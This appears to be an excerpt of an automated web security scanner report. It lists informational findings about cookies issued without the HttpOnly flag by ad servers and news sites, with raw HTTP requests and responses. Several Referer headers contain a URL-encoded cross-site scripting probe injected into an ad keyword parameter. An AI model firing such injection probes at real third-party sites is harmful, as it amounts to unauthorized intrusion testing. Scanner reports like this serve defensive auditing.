Cookie: _cph="1295039779.438.1.1,"; _vr="1295482435..60536~60671~66149~103579~170504~173095~306401~,"; _uid="a104_5562153497824379009"; _wr="g11951"; _auv="g11951~5.1296076541.0,12670.1296075237.880,12671.1296076541.0,^"; _cvr="1296076529^11575^sg11951~sg11611^0~0^2206.000000~0.000000,"; _pr="1296076540.8163.209169~209170~,1296076434.7120.209169~209170~,1296076334.4450.209169~209170~,1296076263.3972.209169~209170~,1296076138.3959.209169~209170~,1296076027.4830.209169~209170~,1296075922.4171.209169~209170~,1296075822.3611.209169~209170~,1296075754.4614.209169~209170~,1296075621.9008.209169~209170~,1296075510.8419.209169~209170~,1296075405.9586.209169~209170~,1296075304.8942.209169~209170~,1296075235.1965.209169~209170~,1296075101.798.209169~209170~,1296074990.1228.209169~209170~,1296074859.104.209169~209170~,1296074758.1162.209169~209170~,1296074642.5926.209169~209170~,1296074515.1669.209169~209170~,1296074405.2652.209169~209170~,1296074299.7276.209169~209170~,1296074199.8486.209169~209170~,1296074130.5588.209169~209170~,1296074005.5439.209169~209170~,1296073893.9848.209169~209170~,1296073785.9641.209169~209170~,1296073682.7603.209169~209170~,1296073611.6354.209169~209170~,1296073486.2138.209169~209170~,1296073374.8594.209169~209170~,1296073267.5235.209169~209170~,1296073166.3153.209169~209170~,1296073098.1567.209169~209170~,1296072968.5610.209169~209170~,"; _sc="sg11951.1296072535.1296076541.28800.2377.0,"; NSC_okcbewjq1.gxnsn.ofu=ffffffff09091c3945525d5f4f58455e445a4a423209
Content-Length: 3345

<adRequest profile="11894:Veoh_Live" version="1" networkId="11894"><customDistributor /><capabilities><supportsSlotTemplate /><explicitVideoTracking /><expectMultipleCreativeRenditions /><supportsAdUn
...[SNIP]...

Response

HTTP/1.1 200 OK
Set-Cookie: _sid="c110_5569572937864193463";domain=.fwmrm.net;path=/;
Set-Cookie: _uid="a104_5562153497824379009";expires=Fri, 03 Feb 2012 21:07:32 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1296767252.0+7564699552021921.248599~249349~331220~,";expires=Sat, 05 Mar 2011 21:07:32 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg12288.1296767252.1296767252.28800.0.0,";expires=Sat, 05 Mar 2011 21:07:32 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g12288";expires=Sat, 05 Mar 2011 21:07:32 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/xml
Pragma: no-cache
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:07:31 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"
Content-Length: 12774

<adResponse version='1'><rendererManifest version='1'>&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
&lt;adRenderers version=&apos;1&apos;&gt;&lt;adRenderer adUnit=&apos;video,&apos;
...[SNIP]...

13.99. http://a9.com/-/spec/opensearch/1.1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a9.com
Path:   /-/spec/opensearch/1.1/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /-/spec/opensearch/1.1/ HTTP/1.1
Host: a9.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:31:21 GMT
Server: Server
Content-Type: text/html; charset=utf-8
Content-Length: 2727
Set-Cookie: a9locale=en_US; Domain=.a9.com; Path=/
Set-Cookie: a9Temp="{\"w\":\"m\"}"; Version=1; Domain=.a9.com; Path=/
Vary: Accept-Encoding,User-Agent
Connection: close


<html>
<head>


<script language="javascript" type="text/javascript">
<!--
var a9IsIE7 = true;
var a9IsIE = true;
var a9IsMoz = false;
var a9IsSafari = false;
var a9IsOpera = false;

...[SNIP]...

13.100. http://abcnews.go.com/Sports/wireStory  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://abcnews.go.com
Path:   /Sports/wireStory

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Sports/wireStory HTTP/1.1
Host: abcnews.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:31:26 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc05
X-Powered-By: ASP.NET
Set-Cookie: SWID=B93EDC68-F596-4509-B1FC-2C48F519C999; path=/; expires=Thu, 03-Feb-2031 20:31:23 GMT; domain=.go.com;
Content-Length: 7679
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">

<head>
<title>ABC
...[SNIP]...

13.101. http://ad.doubleclick.net/ad/N3671.msnmidfunnel.com/B5159652.21  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3671.msnmidfunnel.com/B5159652.21

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/N3671.msnmidfunnel.com/B5159652.21;sz=1x1;pc=%5BTPAS_ID%5D;ord=2013940297? HTTP/1.1
Accept: */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Date: Fri, 04 Feb 2011 02:29:40 GMT
Location: http://s0.2mdn.net/viewad/998766/49-1x1.gif
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 04 Feb 2011 02:44:40 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Server: GFE/2.0
Content-Type: text/html


13.102. http://ad.doubleclick.net/ad/N6421.152847.MSN.COM/B5094800.20  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N6421.152847.MSN.COM/B5094800.20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/N6421.152847.MSN.COM/B5094800.20;abr=!ie4;abr=!ie5;sz=1x1;ord=1362100664? HTTP/1.1
Accept: */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Fri, 04 Feb 2011 02:29:41 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Location: http://s0.2mdn.net/viewad/2850237/1x1.gif
Content-Type: image/gif
Set-Cookie: test_cookie=CheckForPermission; expires=Fri, 04-Feb-2011 02:44:41 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 0
X-XSS-Protection: 1; mode=block


13.103. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=1050&id=5&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Thu, 03 Feb 2011 19:12:57 GMT
Connection: close
Set-Cookie: T_1ean=9tc%3A0%3A1; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 19:12:57 GMT; Path=/
Set-Cookie: rth=2-lg22pl-9tc~0~1~1-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 19:12:57 GMT; Path=/
Set-Cookie: uid2=45fd1eda4-2d99-4f35-96df-d7009f04548c-gjq1nbbd; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 19:12:57 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

13.104. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=1050&id=5&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_h9m4=h0l%3A86c%3A1; T_4mpe=h0h%3A86c%3A1; T_3q8t=h0l%3A86c%3A1; T_ax3f=h0h%3A86c%3A1; dly2=3-lg2agz-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2agz-1~1b4ykgj40t72i~i9b~4fqb~0-1~14288lsu2vxsy~i97~4fq7~q-1~1aao14q745q7r~i9b~4fqb~q-1~15stqp6ba7xf0~i9b~4fqb~13-; rth=2-lg22an-h0h~86c~1~1-h0l~86c~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Fri, 04 Feb 2011 01:52:39 GMT
Connection: close
Set-Cookie: T_h9m4=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_4mpe=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3q8t=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ax3f=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_dk1b=9tc%3Aix4%3A1; Domain=trafficmp.com; Expires=Sat, 04-Feb-2012 01:52:39 GMT; Path=/
Set-Cookie: rth=2-lg22an-9tc~ix4~1~1-h0h~86c~1~1-h0l~86c~1~1-; Domain=trafficmp.com; Expires=Sat, 04-Feb-2012 01:52:39 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

13.105. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=1050&id=5&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Thu, 03 Feb 2011 19:03:59 GMT
Connection: close
Set-Cookie: T_4ffd=9tc%3A0%3A1; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/
Set-Cookie: rth=2-lg22an-9tc~0~1~1-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/
Set-Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

13.106. http://ad.trafficmp.com/a/js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/js?plid=23661 HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-82680071_1296770408,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=atf;tile=3;sz=300x250;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_ahzq=h0l%3A85m%3A1; T_km24=h0h%3A85m%3A1; dly2=3-lg2ag9-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2ag9-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Date: Thu, 03 Feb 2011 22:00:09 GMT
Pragma: no-cache
Connection: close
Set-Cookie: T_ahzq=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_km24=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_dh48=h0l%3A85m%3A1; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Set-Cookie: T_3kcq=h0h%3A85m%3A1; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Set-Cookie: dly2=3-lg2ag9-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Set-Cookie: dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Set-Cookie: hst2=3-lg2ag9-1~13hf80rcjfxxj~i99~4fq9~0-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Set-Cookie: rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Content-Length: 12598

document.write('\<IFRAME SRC=\"http://ad.doubleclick.net/adi/N3671.TMP/B5159652.22;sz=300x250;pc=[TPAS_ID];click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*laKD_99*KEh_115*tlB_3443735*xel
...[SNIP]...

13.107. http://ad.trafficmp.com/a/js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/js?plid=23659 HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-28103178_1296770408,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=btf;tile=5;sz=160x600;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_ahzq=h0l%3A85m%3A1; T_km24=h0h%3A85m%3A1; dly2=3-lg2ag9-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2ag9-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Date: Fri, 04 Feb 2011 01:48:45 GMT
Pragma: no-cache
Connection: close
Set-Cookie: T_ahzq=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_km24=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_1ifd=h0l%3Aiqm%3A1; Domain=trafficmp.com; Expires=Sat, 04-Feb-2012 01:48:45 GMT; Path=/
Set-Cookie: T_4xsl=h0h%3Aiqm%3A1; Domain=trafficmp.com; Expires=Sat, 04-Feb-2012 01:48:45 GMT; Path=/
Set-Cookie: dly2=3-lg2l19-; Domain=trafficmp.com; Expires=Sat, 04-Feb-2012 01:48:45 GMT; Path=/
Set-Cookie: dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; Domain=trafficmp.com; Expires=Sat, 04-Feb-2012 01:48:45 GMT; Path=/
Set-Cookie: hst2=3-lg2l19-1~1kuythfcbtwpz~i97~4fq7~0-1~1aao14q745q7r~i9b~4fqb~al0-1~15stqp6ba7xf0~i9b~4fqb~ald-; Domain=trafficmp.com; Expires=Sat, 04-Feb-2012 01:48:45 GMT; Path=/
Set-Cookie: rth=2-lg22an-h0h~iqm~1~1-h0l~iqm~1~1-9tc~0~1~1-; Domain=trafficmp.com; Expires=Sat, 04-Feb-2012 01:48:45 GMT; Path=/
Content-Length: 12605

document.write('\<IFRAME SRC=\"http://ad.doubleclick.net/adi/N3671.TMP/B5159652.23;sz=160x600;pc=[TPAS_ID];click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*laKR_99*KEB_115*tlB_3443735*xpC
...[SNIP]...

13.108. http://ad.trafficmp.com/a/js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/js?plid=23663 HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-14847884_1296770433,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_fg2y=h0l%3A85m%3A1; T_73th=h0h%3A85m%3A1; dly2=3-lg2ag9-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2ag9-1~14288lsu2vxsy~i97~4fq7~0-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Date: Thu, 03 Feb 2011 22:00:34 GMT
Pragma: no-cache
Connection: close
Set-Cookie: T_fg2y=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_73th=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3q8t=h0l%3A86c%3A1; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:35 GMT; Path=/
Set-Cookie: T_ax3f=h0h%3A86c%3A1; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:35 GMT; Path=/
Set-Cookie: dly2=3-lg2agz-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:35 GMT; Path=/
Set-Cookie: dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:35 GMT; Path=/
Set-Cookie: hst2=3-lg2agz-1~1b4ykgj40t72i~i9b~4fqb~0-1~14288lsu2vxsy~i97~4fq7~q-1~1aao14q745q7r~i9b~4fqb~q-1~15stqp6ba7xf0~i9b~4fqb~13-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:35 GMT; Path=/
Set-Cookie: rth=2-lg22an-h0h~86c~1~1-h0l~86c~1~1-9tc~0~1~1-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:35 GMT; Path=/
Content-Length: 13010

document.write('\<IFRAME SRC=\"http://ad.doubleclick.net/adi/N3671.TMP/B5159652.24;sz=728x90;pc=[TPAS_ID];click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*laKC_99*KEM_115*tlB_3443735*xeM_
...[SNIP]...

13.109. http://ad.trafficmp.com/a/js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/js?plid=23663 HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T_4ffd=9tc%3A0%3A1; rth=2-lg22an-9tc~0~1~1-; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Date: Fri, 04 Feb 2011 01:48:43 GMT
Pragma: no-cache
Connection: close
